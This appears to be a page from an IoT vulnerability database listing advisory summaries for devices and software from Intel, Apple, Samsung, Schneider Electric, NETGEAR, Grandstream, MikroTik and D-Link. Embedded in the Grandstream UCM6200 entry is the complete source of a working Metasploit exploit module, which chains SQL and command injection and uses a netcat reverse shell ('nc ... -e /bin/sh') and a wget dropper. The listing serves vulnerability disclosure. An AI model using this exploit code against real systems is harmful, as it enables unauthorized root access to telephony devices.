VARIoT IoT vulnerabilities database

Improper input validation in the Intel(R) RAID Web Console 3 for Windows* may allow an unauthenticated user to potentially enable denial of service via network access. Intel RAID Web Console 3 (RWC3) is a web-based application program of Intel Corporation that provides monitoring, maintenance, troubleshooting and configuration functions for Intel RAID products. A remote attacker can exploit this vulnerability by sending a malicious POST request to cause the LSA.exe service to exit, resulting in a denial of service

This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra. A malicious application may be able to overwrite arbitrary files. macOS Exists in unspecified vulnerabilities.Information may be tampered with

A use after free issue was addressed with improved memory management. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra. A malicious application may be able to execute arbitrary code with kernel privileges. macOS Exists in a vulnerability related to the use of freed memory.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

An issue was discovered on Samsung mobile devices with P(9.0) software. Quick Panel allows enabling or disabling the Bluetooth stack without authentication. The Samsung ID is SVE-2019-14545 (July 2019). This vulnerability is Samsung ID: SVE-2019-14545 It is published as.Information may be tampered with

An issue was discovered on Samsung mobile devices with N(7.x), O(8.x), and P(9.0) (Broadcom chipsets) software. An out-of-bounds Read in the Wi-Fi vendor command leads to an information leak. The Samsung ID is SVE-2019-14869 (November 2019). This vulnerability is Samsung ID: SVE-2019-14869 It is published as.Information may be obtained

A CWE-306: Missing Authentication for Critical Function vulnerability exists in IGSS (Versions 14 and prior using the service: IGSSupdate), which could allow a local user to execute processes that otherwise require escalation privileges when sending local network commands to the IGSS Update Service. IGSS There is a vulnerability in the lack of authentication for critical features.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows local attackers to escalate privileges on affected installations of Schneider Electric IGSS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the IGSSupdateservice service, which listens on TCP port 12414 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Schneider Electric Interactive Graphical SCADA System (IGSS) is a set of SCADA (Data Acquisition and Monitoring System) system for monitoring and controlling industrial processes by Schneider Electric (France). Schneider Electric IGSS (Interactive Graphical SCADA System) 14 and earlier versions (using IGSSupdate service) have access control error vulnerabilities. The vulnerability stems from network systems or products that do not properly restrict access to resources from unauthorized roles

A CWE-22: Improper Limitation of a Pathname to a Restricted Directory exists in IGSS (Versions 14 and prior using the service: IGSSupdate), which could allow a remote unauthenticated attacker to read arbitrary files from the IGSS server PC on an unrestricted or shared network when the IGSS Update Service is enabled. IGSS Exists in a past traversal vulnerability.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Schneider Electric IGSS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the IGSSupdateservice service, which listens on TCP port 12414 by default. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose files in the context of SYSTEM. Schneider Electric Interactive Graphical SCADA System (IGSS) is a set of SCADA (Data Acquisition and Monitoring System) system for monitoring and controlling industrial processes by Schneider Electric (France). There is a path traversal vulnerability in Schneider Electric IGSS (Interactive Graphical SCADA System) 14 and earlier (using the IGSSupdate service). The vulnerability stems from network systems or products failing to properly filter special elements in resources or file paths. An attacker could use the vulnerability to access a location outside the restricted directory

A CWE-79:Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists Andover Continuum (All versions), which could enable a successful Cross-site Scripting (XSS attack) when using the products' web server

On NETGEAR GS728TPS devices through 5.3.0.35, a remote attacker having network connectivity to the web-administration panel can access part of the web panel, bypassing authentication. NETGEAR GS728TPS There is an authentication vulnerability in the device.Information may be obtained. NETGEAR GS728TPS is an intelligent management switch of NETGEAR

The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. Grandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE', 'Description' => %q{ This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. Exploitation happens in two stages: 1. An SQL injection during username lookup while executing the "Forgot Password" function. 2. A command injection that occurs after the user provided username is passed to a Python script via the shell. Like so: /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 ` This module affect UCM62xx versions before firmware version 1.0.19.20. }, 'License' => MSF_LICENSE, 'Author' => [ 'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module ], 'References' => [ [ 'CVE', '2020-5722' ], [ 'EDB', '48247'] ], 'DisclosureDate' => '2020-03-23', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'Privileged' => true, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { 'DisableNops' => true, 'BadChars' => '\'&|' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, 'CmdStagerFlavor' => [ 'wget' ] } ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'RPORT' => 8089, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end ## # Sends a POST /cgi request with a payload of action=getInfo. The # server should respond with a large json blob like the following, # where "prog_version" is he firmware version: # # {"response"=>{ # "model_name"=>"UCM6202", "description"=>"IPPBX Appliance", # "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/", # "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.", # "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1", # "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US", # "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0", # "support_webrtc_cloud"=>"0"}, "status"=>0} ### def check normalized_uri = normalize_uri(target_uri.path, '/cgi') vprint_status("Requesting version information from #{normalized_uri}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalized_uri, 'vars_post' => { 'action' => 'getInfo' } }) return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200 body_json = res.get_json_document return CheckCode::Unknown('No JSON in response') unless body_json prog_version = body_json.dig('response', 'prog_version') return false if prog_version.nil? vprint_status("The reported version is: #{prog_version}") version = Rex::Version.new(prog_version) if version < Rex::Version.new('1.0.19.20') return CheckCode::Appears("This determination is based on the version string: #{prog_version}.") end return CheckCode::Safe("This determination is based on the version string: #{prog_version}.") end ## # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection # and then it will get passed to a python script via sh which allows us to execute a command injection. # It will look something like this: # # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ # password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 ` # # This functionality is related to the"Forgot Password" feature. This function is rate limited by # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few # payloads are appropriate. ### def execute_command(cmd, _opts = {}) rand_num = Rex::Text.rand_text_numeric(1..5) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi'), 'vars_post' => { 'action' => 'sendPasswordEmail', 'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`" } }, 5) # the netcat reverse shell payload holds the connection open. So we'll treat no response # as a success. The meterpreter payload does not hold the connection open so this clause digs # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload # generates an error (e.g. rate limit error) if res fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200 body_json = res.get_json_document fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json status_json = body_json['status'] fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0 end print_good('Exploit successfully executed.') end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end

A CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'), reflective DLL, vulnerability exists in EcoStruxure Control Expert (all versions prior to 14.1 Hot Fix), Unity Pro (all versions), Modicon M340 (all versions prior to V3.20), Modicon M580 (all versions prior to V3.10), which, if exploited, could allow attackers to transfer malicious code to the controller. plural Schneider Electric The product contains an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Schneider Electric Modicon M580, etc. are all products of Schneider Electric in France. Schneider Electric Modicon M580 is a programmable automation controller. Schneider Electric Modicon M340 is a mid-range PLC (programmable logic controller) for industrial processes and infrastructure. Schneider Electric EcoStruxure Control Expert (formerly known as Unity Pro) is a set of programming software for Schneider Electric logic controller products. Many Schneider Electric products have injection vulnerabilities that attackers can use to send malicious code to the controller. The following products and versions are affected: EcoStruxure Control Expert 14.1 Hot Fix previous version; Unity Pro (full version); Modicon M340 V3.20 previous version; Modicon M580 V3.10 previous version

NETGEAR Prosafe WC9500 5.1.0.17, WC7600 5.1.0.17, and WC7520 2.5.0.35 devices allow a remote attacker to execute code with root privileges via shell metacharacters in the reqMethod parameter to login_handler.php. NETGEAR Prosafe WC9500 , WC7600 , WC7520 On the device OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR Prosafe WC9500, etc. are all wireless controllers used by NETGEAR to manage AP access points. There are security vulnerabilities in NETGEAR Prosafe WC9500 version 5.1.0.17, WC7600 version 5.1.0.17 and WC7520 version 2.5.0.35

A CWE-79:Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists Andover Continuum (All versions), which could cause a Reflective Cross-site Scripting (XSS attack) when using the products' web server

The SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections, and cause a reboot via connect and write system calls, because of uncontrolled resource management. plural MikroTik A router contains a resource exhaustion vulnerability.Service operation interruption (DoS) It may be put into a state. MikroTik routers is a router product of Latvian MikroTik company. The SSH daemon in MikroTik routers v6.44.3 and previous versions has a security vulnerability. A remote attacker can use this vulnerability to prevent a new authorized connection from proceeding

A CWE-94: Improper Control of Generation of Code ('Code Injection') vulnerability exists in Andover Continuum (All versions), which could cause files on the application server filesystem to be viewable when an attacker interferes with an application's processing of XML data. Andover Continuum Exists in a code injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state

A CWE-427: Uncontrolled Search Path Element vulnerability exists in ProSoft Configurator (v1.002 and prior), for the PMEPXM0100 (H) module, which could cause the execution of untrusted code when using double click to open a project file which may trigger execution of a malicious DLL. ProSoft Configurator There is a vulnerability in an element of an uncontrolled search path.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Schneider Electric ProSoft Configurator is a configuration manager for logic controllers of Schneider Electric in France. Schneider Electric ProSoft Configurator v1.002 and previous versions (for Modicon PMEPXM0100(H) module) have code issue vulnerabilities. Attackers can use this vulnerability to execute untrusted code

A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Quantum Ethernet Network module 140NOE771x1 (Versions 7.0 and prior), Quantum processors with integrated Ethernet – 140CPU65xxxxx (all Versions), and Premium processors with integrated Ethernet (all Versions), which could cause a Denial of Service when sending a specially crafted command over Modbus

ABB PB610 is a software designed by Swiss ABB for the CP600 control panel platform. The ABB PB610 full range of products has an information disclosure vulnerability, which can be used by attackers to obtain sensitive information.

D-Link DIR-878, DIR-882, and DIR-867 are all D-Link router products. Many D-Link routers have command execution vulnerabilities that attackers can use to gain control of the website server.

The ifw8 Router ROM router is an enterprise-level router device of Chengdu Zhifengwang Technology Co., Ltd., which is mostly used in Internet cafes and large enterprise networks. Ifw8 Router ROM router has an unauthorized access vulnerability, which can be exploited by attackers to obtain sensitive information.